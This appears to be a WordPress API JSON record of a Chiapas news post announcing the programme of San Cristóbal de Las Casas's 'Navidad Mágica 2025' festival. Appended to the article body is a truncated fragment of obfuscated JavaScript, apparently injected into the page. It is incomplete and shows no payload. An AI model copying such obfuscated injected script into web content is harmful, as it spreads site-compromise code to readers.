{"id":25788,"date":"2025-12-15T05:57:15","date_gmt":"2025-12-15T05:57:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25788"},"modified":"2025-12-15T05:57:15","modified_gmt":"2025-12-15T05:57:15","slug":"presentan-programa-del-segundo-festival-navidad-magica-2025-en-san-cristobal-de-las-casas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25788","title":{"rendered":"Presentan programa del Segundo Festival \u201cNavidad M\u00e1gica 2025\u201d en San Crist\u00f3bal de Las Casas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"482\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493636.jpg\" alt=\"\" class=\"wp-image-25789\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493636.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493636-300x201.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493636-110x75.jpg 110w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez corresponsal<\/p>\n\n\n\n<p>14 de diciembre del 2025. San Crist\u00f3bal de Las Casas.\u2013 Autoridades municipales, acompa\u00f1adas de regidoras y regidores, presentaron de manera oficial el programa del Segundo Festival Navidad M\u00e1gica 2025, que se llevar\u00e1 a cabo del 17 al 21 de diciembre, con el objetivo de fortalecer la convivencia familiar, promover la cultura y preservar las tradiciones decembrinas en el municipio.<\/p>\n\n\n\n<p>Durante la presentaci\u00f3n se inform\u00f3 que el festival es resultado del trabajo coordinado del Ayuntamiento y de la colaboraci\u00f3n de distintos sectores ciudadanos, con el prop\u00f3sito de generar espacios de encuentro y llevar alegr\u00eda a las familias sancristobalenses durante esta temporada.<\/p>\n\n\n\n<p>El programa contempla diversas actividades culturales, art\u00edsticas y recreativas, entre ellas la participaci\u00f3n de la Orquesta y Coro por la Paz, la tradicional chocolatada, la pista de patinaje sobre hielo, la caravana y desfile navide\u00f1o, el festival de luces, as\u00ed como presentaciones de danza folcl\u00f3rica y conciertos musicales, que se desarrollar\u00e1n en sedes como la Plaza de La Paz.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez corresponsal 14 de diciembre del 2025. San Crist\u00f3bal de Las Casas.\u2013 Autoridades municipales, acompa\u00f1adas de regidoras y regidores, presentaron de manera oficial el programa del Segundo Festival Navidad M\u00e1gica 2025, que se llevar\u00e1 a cabo del 17 al 21 de diciembre, con el objetivo de fortalecer la convivencia familiar, promover la cultura y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25789,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-25788","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25788","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25788"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25788\/revisions"}],"predecessor-version":[{"id":25790,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25788\/revisions\/25790"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25789"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25788"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25788"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25788"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}